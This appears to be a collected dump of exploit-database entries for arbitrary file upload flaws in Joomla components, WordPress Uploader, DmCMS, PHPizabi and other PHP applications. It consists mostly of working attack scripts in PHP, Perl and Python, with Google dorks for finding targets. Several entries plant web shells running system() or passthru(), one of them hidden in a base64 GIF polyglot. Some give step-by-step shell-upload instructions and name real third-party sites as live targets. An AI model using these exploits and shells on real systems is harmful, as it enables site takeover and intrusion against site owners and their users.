exploit joomla cache upload


Sammy FORGIT/Joomla DentroVideo 1.2 Shell Upload ( na)

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Joomla Components - DentroVideo Arbitrary File Upload Vulnerability
# Version : 1.2
# Link : http://www.dentrovideo.com/en.html
# Software : http://dentrovideo.com/com_dv.last.tar.gz
# Date : 08-06-2012
# Google Dork : inurl:/components/com_dv/externals
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit 1 :

PostShell.php

<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.exemple.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('file1'=>"@$uploadfile",
                'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.exemple.com/lo.php

lo.php
<?php
phpinfo();
?>


Exploit 2 :

PostShell2.php

<?php

$uploadfile="lo.php.mpg3";

$ch = curl_init("http://www.exemple.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.exemple.com/dvvideos/uploads/originals/lo.php.mpg3

lo.php.mpg3
<?php
phpinfo();
?>


Joomla DentroVideo component version 1.2 suffers from a remote shell upload vulnerability.

Al-Ghamdi/Joomla jDownloads 1.0 Shell Upload ( na)

____________________________________________________________________
____________________________________________________________________


-=-=-=-{In The Name Of Allah The Merciful}-=-=-=-=-

[~] Exploit Title: [jDownloads 1.0 Remote File Upload Vulnerability]


[~] Found By: Al-Ghamdi
[?] Contact: by-root@hotmail.com
[?] Date: 18.5.2011
[?] Home: in my home
[~] Software Link: [http://www.jdownloads.com/index.php?option=com_jdownloads&Itemid=133&task=view.download&catid=22&cid=234]
[~] Version: 1.0
[~] Dork : "Powered by jDownloads"
____________________________________________________________________
____________________________________________________________________

Exploit :

# Open Site ..
# Register [when you are required to register] ..
# Go to : [Submit file] ..
# Make Shell format like [shell.php.jpg] ..
# Then Upload your Shell ..
# You will see the path of your shell ..


# Example   http://www.site.com/public-relations/testimonials
# Example   http://www.site.com/index.php?/component/option,com_jdownloads/Itemid,70/task,view.upload/

(+)Gr33ts to : Only my God [ Allah ] ..
____________________________________________________________________
____________________________________________________________________



Joomla jDownloads component version 1.0 suffers from a shell upload vulnerability.

r3dm0v3/Uploaderr Arbitrary File Upload ( na)

#!/usr/bin/perl
#################################################################
#Title:       Uploaderr Remote Arbitrary File Upload Exploit    #
#                                                               #
#Credit:      r3dm0v3                                           #
#             http://r3dm0v3.persianblog.ir                     #
#             r3dm0v3[4t]yahoo[dot]com                          #
#             Tehran - Iran                                     #
#                                                               #
#Vendor:      http://www.uploaderr.com/                         #
#Price:       9.95$                                             #
#Remote:      Yes                                               #
#Dork:        "Powered by Uploaderr"                            #
#Fix:         Not Available                                     #
#                                                               #
#Special thx: Neo limpizik_neo[4t]yahoo[dot]com                 # 
#################################################################

$maxfilesize=250000;
$port=80;

use IO::Socket;

&Banner();

if (@ARGV < 2) {
  &Usage();
  exit(1);
}

$path = $ARGV[0];
if (substr($path,length($path)-1,1) ne "/"){
  $path.="/";
} 

$url=$path;
if (lc($url)=~/http:\/\//){
  lc($url) =~ /http:\/\/([a-zA-Z0-9.\/_-]+)/;
  $url= $1;
}
else{
  $url =~ /([a-zA-Z0-9.\/_-]+)/;
  $url= $1;
}
$url =~ /([a-zA-Z0-9-_.]+)/;
$host=$1;
$url=~s/$host//;
$file=$ARGV[1];

print "[+] Connecting to $host\n";

open(FILETOUPLOAD,$file) || die "Can not open the file: $!\n";
@filecontent=<FILETOUPLOAD>;
close(FILETOUPLOAD);

$content="-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n".
         $maxfilesize."\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"userfile\"; filename=\"".$file."\"\n".
         "Content-Type: image/jpeg\n\n".
         "@filecontent\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"upload\"\n\n".
         "true\n".
         "-----------------------------7d92ce322fc0564\n".
         "Content-Disposition: form-data; name=\"submitbutton\"\n\n\n".
         "-----------------------------7d92ce322fc0564--\n";
$req="POST ".$url."upload.php HTTP/1.1\n".
     "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\n".
     "Content-Type: multipart/form-data; boundary=---------------------------7d92ce322fc0564\n".
     "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\n".
     "Host: ".$host."\n".
     "Content-Length: ".length($content)."\n".
     "Connection: Close\n".
     "Cache-Control: no-cache\n\n".
     $content;

$connect = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "Cannot connect to $host: $!\n";
print $connect $req;
while (<$connect>) {
$response.=$_;
}

$response=~ /.+input onclick="javascript:this\.select\(\);" type="text" value="([a-zA-Z0-9.\/:_-]+)" readonly.+/;
$uploadedFile=$1;
if ($uploadedFile){
  print "[+] File uploaded: ".$uploadedFile."\n";
}else{
  print "[!] Failed.\n";
}


sub Banner{
print "############################################################\n".
      "#     Uploaderr Remote Arbitrary File Upload Exploit       #\n".
      "#                       by r3dm0v3                         #\n".
      "#                  r3dm0v3[4t]yahoo[.]com                  #\n".
      "#               http://r3dm0v3.persianblog.ir              #\n".
      "############################################################\n";
}

sub Usage(){
print "\n Usage: uploaderr.pl <host&path> <local_file>\n";
print " ex.  : uploaderr.pl site.com/upload/ shell.php\n";
}

Uploaderr remote arbitrary file upload exploit.

gmda/Joomla Simple File Upload 1.3 Remote Code Execution ( na)

<?PHP

/*
    --------------------------------------------------------------------------------
    Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit
    --------------------------------------------------------------------------------

    Author...............: gmda
    Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla"
    Mail.................: gmda[at]email[dot]it
    Site.................: http://www.gmda.altervista.org/
    Date.................: 26/12/2011
    Software Link: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip
    Version: 1.3
    Tested on: winxp php version 5.3.2  Apache 2.0

    *the setup of the module is no captcha other setups are the default*

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+



    The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly.
    This thing can be a bad intent to send commands to the server running clearly causing safety problems ........
    The script has problems with upload quality control .....


*/


$host="127.0.0.1";
$port=80;
$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg==";
$ContentType="image/gif";
$post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$filename="file.php5";








if(!$fp) die($errstr.$errno); else {





                $data="-----------------------------41184676334\r\n";
                $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n";
                $data.="\r\n";
                $data.="100000\r\n-----------------------------41184676334\r\n";
                $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n";
                $data.="\r\n\r\n";
                $data.="-----------------------------41184676334\r\n";
                $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n";
                $data.=base64_decode($shell)."\r\n";
                $data.="-----------------------------41184676334--\r\n";




                $packet="$post HTTP/1.1\r\n";
                $packet.="Host: ".$host.":".$port."\r\n";
                $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
                $packet.="Content-Length: ".strlen($data)."\r\n";
                $packet.="Connection: Close\r\n\r\n";
                $packet.=$data;




fwrite($fp, $packet);
    fclose($fp);




}





    $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r");
      if ($h) {
            while (($buf = fgets($h, 4096)) !== false) {
             echo $buf;
             echo("exploit was successful");
   }

    fclose($h);
    }else{
     echo("Error: exploit fail");
   }
?>



The Joomla Simple File Upload component version 1.3 suffers from a remote code execution vulnerability.

Sammy FORGIT/Joomla Dione FileUploader 1.0.1 Shell Upload ( na)

##################################################
# Description : Joomla Components - Dione FileUploader Arbitrary File Upload Vulnerability
# Version : 1.0.1
# Link : http://www.dionesoft.com/solutions/joomlaextensions/dionefileuploader
# Date : 14-06-2012
# Google Dork : inurl:/modules/mod_dionefileuploader/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.exemple.com/modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/modules/mod_dionefileuploader/lo.php

lo.php
<?php
phpinfo();
?>



Joomla Dione FileUploader component version 1.0.1 suffers from a remote shell upload vulnerability.

J3yk0ob/Joomla Component (com_remository) Remote Upload File ( php)

#################################################################
#                           I N F O
#
# Exploit Title: Joomla com_remository Remote Upload File
# Date: 2010-08-26 
# Author: J3yk0ob
# Home  : http://www.J3yk0ob.com
#
#################################################################
#                        E X P L O I T
#
#  1. Register On Site
#
#  2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile
#
#  3. Add your php file , example : shell.php
#
#  4. http://www.Target.com/components/com_remository_files/
#
#  5. If the web server allows you to see the directory you can see a folder, example : file_image_2
#
#  6. You can find your shell in the latest file_image_[latest Number]
#
#  7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php
#
#  Dork : inurl:"index.php?com_remository"
#
#################################################################
# Contact Me
#
# Home : http://www.J3yk0ob.com
# Email : 4dm1n@J3yk0ob.com
#
##################################################################

D4NB4R/Joomla OS Property 2.0.2 Unrestricted File Upload ( php)

_______________________________________________________________________________________
 
 Exploit Title: Joomla com_osproperty Unrestricted File Upload 

 Google Dork: com_osproperty

 Date: [13-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://www.insecurityperu.org/  &  http://poisonsecurity.wordpress.com/

 Vendor: Ossolution Team http://extensions.joomla.org/

 Version: 2.0.2 (last update on Jul 12, 2012)

 License: Commercial $ 28.86us
 
 Tested on: [Linux(arch)-Windows(7ultimate)]


1.  Go to this route

   http://site/component/osproperty/?task=agent_register


2.  Complete the form, uploading shell.php instead of your photo


3.  Locate your file in the root /osproperty/agent/

    http://site/images/osproperty/agent/randomid_yourshell.php


Help:  This path can help you find your web shell in case you need it

           component/osproperty/?task=agent_default


I'm not responsible for the use that is made of it
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  2012

D4NB4R/Joomla KISS Advertiser Remote File & Bypass Upload Vulnerability ( php)

############################################################################
# 
# Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability 
#
# Google Dork: inurl:index.php?option=com_ksadvertiser
#
# Date: [12-07-2012]
#
# Author: Daniel Barragan "D4NB4R"
#
# Twitter: @D4NB4R
#
# site: http://www.insecurityperu.org/
#
# vendor Link: http://www.kiss-software.de
# 
# Tested on: [Linux(arch)-Windows(7ultimate)]
#

1.  Register; some pages require it

   http://site/index.php?option=com_user&view=login


2.  Go to the upload path

   http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en


3.  Go to images and click upload, browse to your file shell.php, and rename it to shell.php.gif

4.  Locate your file in the root /images/ksadvertiser/U0 -> this may vary

    http://site/images/ksadvertiser/U0/403.php.gif


I'm not responsible for the use that is made of it
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"

Site:  http://www.exploit-db.com // http://packetstormsecurity.org // http://1337day.com/

ViRuSMaN/Joomla Component com_pinboard Remote File Upload Vulnerability ( php)

##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
|    Contact : v-.m@live.com
|
|    Home : Islam-Attack.CoM , HackTeach.OrG
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploit :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] click on the photo in Top Of Left
|
| [#] upload your shell shell.php.jpg  &  please confirm
|
| [#] Pwd Your Shell
|  
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
##############################################################

# milw0rm.com [2009-06-24]


ZoRLu/phpizabi-upload.txt ( na)

############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. browse button click and shell.php upload

-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter

and all users yildirimordulari.org

siircicocuk, where have you been, buddy? hang out on msn, you have made us miss you :)))

## whether yildirimordulari.org will open again or not is unknown, but one thing is known: it is a legend ##

#################################################



PHPizabi version 0.848b C1 HFP1 suffers from a remote file upload vulnerability.

CWH Underground/andysphpkb-upload.txt ( na)

==============================================================
 Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 December 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : Andy's PHP Knowledgebase
VERSION     : 0.92.9
DOWNLOAD    : http://sourceforge.net/project/showfiles.php?group_id=113755
#####################################################

--- Arbitrary File Upload ---

In saa.php page, you can submit an article and attachment file to wait for approval from admin.
Immediately after you submit the article and attachment file, the file has already been on the server without checking file type.
You can upload an arbitrary file through this form and the url to this file is in authors.php page.

--------
  POC
--------

POST /cms/aphpkb/saa.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
Content-Type: multipart/form-data; boundary=---------------------------22955284022147
Content-Length: 1080
-----------------------------22955284022147
Content-Disposition: form-data; name="title"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="article"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="keywords"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream

<? phpinfo(); ?>
-----------------------------22955284022147
Content-Disposition: form-data; name="description"

PHP File
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="a"


-----------------------------22955284022147
Content-Disposition: form-data; name="submit"

Submit/Save
-----------------------------22955284022147--


HTTP/1.x 200 OK
Date: Mon, 01 Dec 2008 05:39:35 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


-----------------------------------------------------------------------

Link for uploaded file is in http://[Target]/[aphpkb_path]/authors.php


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################



Andy's PHP Knowledgebase version 0.92.9 suffers from an arbitrary file upload vulnerability.

HACKERS PAL/dmcms-upload.txt ( na)

Hello
Title : DmCMS Shell Upload
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@soqor.net

File ..
includes/upload_file.php
After Giving Some conditions will allow you to upload any file you want
the exploit here is the proof ..

exploit :

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/*           DmCMS Shell Uploading
/*  This exploit should allow you to execute commands
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/*          DmCMS Shell Uploading             */
/*    by HACKERS PAL <security@soqor.net>     */
/*         site: http://www.soqor.net         */');
if ($argc<4) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host path topath
/* Example:                                   */
/*    php '.$argv[0].' localhost /dmcms/ ../media/
/**********************************************/
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

function connect($packet)
{
  global $host, $port, $html;
    $con=fsockopen(gethostbyname($host),$port);
    if (!$con)
    {
      echo '[-] Error - No response from '.$host.':'.$port; die;
    }
  fputs($con,$packet);
    $html='';
    while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($con,1);
    }
      GLOBAL $html;
  fclose($con);
}

$i=0;
$data="";

function add_data($name,$value,$type="no",$filename)
{
         GLOBAL $data,$i;
if($type=="file")
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\";
Content-Type: text/plain

$value
";
}
elseif($type=="init")
{

$data.="-----------------------------7d62702f250530--";

}
elseif($type=="clean")
{
$data="";
}
else
{
$data.="-----------------------------7d62702f250530
Content-Disposition: form-data; name=\"$name\";
Content-Type: text/plain

$value
";
}


}

$host=$argv[1];
$path=$argv[2];
$default_path=$argv[3];
$port=80;

$cmd=urlencode($cmd);

$p='http://'.$host.':'.$port.$path;

Echo "\n[+] Trying to Upload File";

$cookie="Master=HACKERS20%PAL";
$contents='<?php
$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];
system($cmd);
?>';

add_data("empty.php","","file","File1");
add_data("soqor.php",$contents,"file","File2");
add_data("soqor.php",$contents,"file","File3");
add_data('','',"init");

$packet="POST ".$p."includes/upload_file.php?default_path=$default_path HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."ok.php?do=act\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
connect($packet);

if (!eregi($default_path,$html))
{
    echo"\n/* [+] Successfully Exploited";
}
   echo ("\n/*         Visit us : WwW.SoQoR.NeT           */\n/**********************************************/");
?>
#WwW.SoQoR.NeT


DmCMS suffers from an upload flaw that allows for arbitrary code execution.

AutoSec Tools/WordPress Uploader 1.0.0 Shell Upload ( na)

# ------------------------------------------------------------------------
# Software................WordPress Uploader 1.0.0
# Vulnerability...........Arbitrary Upload
# Download................http://wordpress.org/extend/plugins/uploader/
# Release Date............1/24/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# ------------------------------------------------------------------------
# 
# --Description--
# 
# An arbitrary upload vulnerability in WordPress Uploader 1.0.0 can be
# exploited to upload a PHP shell.
# 
# 
# --PoC--

import socket

host = 'localhost'
path = '/wordpress'
shell_path = '/shell.php'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    

    s.send('POST ' + path + '/wp-content/plugins/uploader/uploadify/uploadify.php?folder=/ HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n'
           '\r\n'
           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
           '------x--\r\n'
           '\r\n')

    resp = s.recv(8192)

    http_ok = 'HTTP/1.1 200 OK'

    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)    
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
           'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
    else: print 'shell located at http://' + host + shell_path

upload_shell()


WordPress Uploader plugin version 1.0.0 remote shell upload exploit.

ByALBAYX/Joomla Agora Component 3.0.0 RC1 File Upload ( na)

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG
@~~===============TURKISH=================~~@

              _.--"""""--._
            .'             '.
           /                 \
          ;       C4TEAM      ;
          |                   |
          |                   |
          ;                   ;                   ByALBAYX
           \ (`'--,    ,--'`) /
            \ \  _ )  ( _  / /                 WWW.C4TEAM.ORG
             ) )(')/  \(')( (
            (_ `""` /\ `""` _)
             \`"-, /  \ ,-"`/                       
              `\ / `""` \ /`
               |/\/\/\/\/\|                      
               |\        /|
               ; |/\/\/\| ;
                \`-`--`-`/
                 \      /
                  ',__,'


@~~=======================================~~@
@~~=Script   : Joomla Component Com_Agora 3.0.0 RC1

@~~=S.Site   : http://joomlame.com

@~~=Demo     : http://joomlame.com/index.php?option=com_agora&task=upload

@~~=======================================~~@

@~~=Hole Found:

@~~=http://c4team.org/ [Path] /index.php?option=com_agora&task=upload

@~~=http://c4team.org/ [Path] /components/com_agora/img/members/0/ [Shell.php]

@~~=Search  : "inurl:com_agora"

@~~=http://kht.by.ru/Google.txt

@~~=Etc..


@~~=L!ve Demo:

@~~=======================================~~@

@~~=Come on then, there are quite a few sites, a good server will come along, it will show up on google and so on and you will be famous  :D

@~~=:/




The Joomla Agora component version 3.0.0 RC1 suffers from a remote file upload vulnerability.

Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload ( na)

# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability

# Google Dork: inurl:/components/com_civicrm/

# Date: 08/22/2012

# Author: Crim3R

# download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/

# Tested on: all

==================================
  
D3m0:
http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html


http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html


http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html


===============Crim3R@Att.Net=========

$Home = %00

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir



Joomla versions 1.7 and 2.5 suffer from an arbitrary file upload vulnerability in the Civicrm component.